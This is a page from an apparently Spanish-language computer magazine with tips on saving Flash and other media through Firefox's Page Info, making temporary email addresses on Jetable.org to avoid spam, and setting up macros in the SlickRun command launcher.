Guardar imágenes (JPG, GIF, etc.) de una página web es sencillo: simplemente, hacemos clic derecho y elegimos la opción correspondiente del menú desplegable. La situación cambia cuando lo que deseamos guardar son animaciones Flash y algunos otros formatos que, por lo general, nos fuerzan a usar algún artilugio extraño para copiarlos a nuestro disco. Por suerte, Firefox nos permite hacer esto de una manera muy sencilla: 1) Dentro de la página que incluye los archivos multimedia que deseamos descargar, hacemos clic derecho y elegimos [View Page Info]. 2) Se cargará una pequeña ventana con varias solapas. Ingresamos en [Media], donde encontraremos una lista de todos los archivos multimedia utilizados en la página, junto con una vista previa en la parte inferior. 3) Para guardar una animación Flash, un video, un archivo de audio, una imagen o cualquier otro documento que nos interese, debemos seleccionarlo y hacer clic en [Save As]. Luego elegimos el directorio de destino y presionamos [Save]. Con este pequeño truco, podemos guardar prácticamente cualquier formato multimedia que haya dentro de la página, excepto las películas en formato QuickTime.

INTERNET

ESCAPAR DEL SPAM CON CUENTAS DE MAIL TEMPORALES Si sabemos que algún sitio donde dejamos una dirección de mail seguramente nos hará recibir toneladas de spam de todo tipo y color, podemos utlizar el interesante servicio que nos brinda Jetable.org. Dentro de este site, podemos crear una cuenta de mail temporal, que recibirá los que nos envíen y los reenviará a nuestra cuenta principal. Luego de un tiempo que nosotros determinemos, la cuenta dejará de existir. De esta forma, podremos “esquivar” el spam utilizando una dirección temporal en vez de la nuestra real.

40

»

Para crear esa cuenta, vamos a www. jetable.org/es y, en la página principal, escribimos la dirección de mail a la que deseamos que se nos reenvíen los mensajes, en el campo [Correo electrónico], y el tiempo durante el cual queremos que exista la cuenta (desde 24 horas hasta 8 días), en [Duración de validez]. Luego, hacemos clic en [Crea su e-mail efímero]. En la siguiente página veremos el nombre de la cuenta temporal, la que podremos empezar a usar para recibir los mails.

e Tw s ak SOFTWARE

LINEA DE COMANDOS TODOPODEROSA

»

SlickRun es una aplicación gratuita que agrega una pequeña línea de comandos a nuestro Escritorio. Desde ella podemos cargar cualquier programa que tengamos instalado en Windows, ingresar en una página web con sólo escribir la dirección, buscar el significado de una palabra, agregar texto en un pequeño bloc de notas, apagar o reiniciar Windows y ver el estado del tiempo, entre muchas otras posibilidades. Además de las macros, llamadas MagicWords, con las que cuenta en forma predefinida, podemos crear las nuestras propias utilizando una palabra clave que, simplemente, tenemos que escribir para que se ejecute. El instalador de la aplicación ocupa apenas 165 KB y puede descargarse desde www.bayden.com/SlickRun haciendo clic en [Download SlickRun]. Una vez que lo hayamos instalado, podemos utilizar algunas de las macros que aparecen listadas cuando hacemos clic con el botón derecho y elegimos la opción [MagicWords], del menú desplegable. Para crear una macro debemos realizar el siguiente procedimiento: 1) Hacemos clic derecho sobre la línea de comandos de SlickRun y elegimos [New MagicWord...]. 2) En la siguiente ventana, en el campo [MagicWord], escribimos la palabra con la que deseamos ejecutar la macro. 3) En [Filename or URL] ingresamos la dirección de una página web o la ubicación del archivo ejecutable de una aplicación que deseamos correr. 4) Finalmente, para grabar la macro hacemos clic en el botón con la marca verde. 5) Para utilizar la macro sólo debemos ir a la línea de comandos de SlickRun, escribir la palabra que ingresamos en 2) y presionar <Enter>.

POWERUSR


Turn static files into dynamic content formats.

Create a flipbook
Issuu converts static files into: digital portfolios, online yearbooks, online catalogs, digital photo albums and more. Sign up and create your flipbook.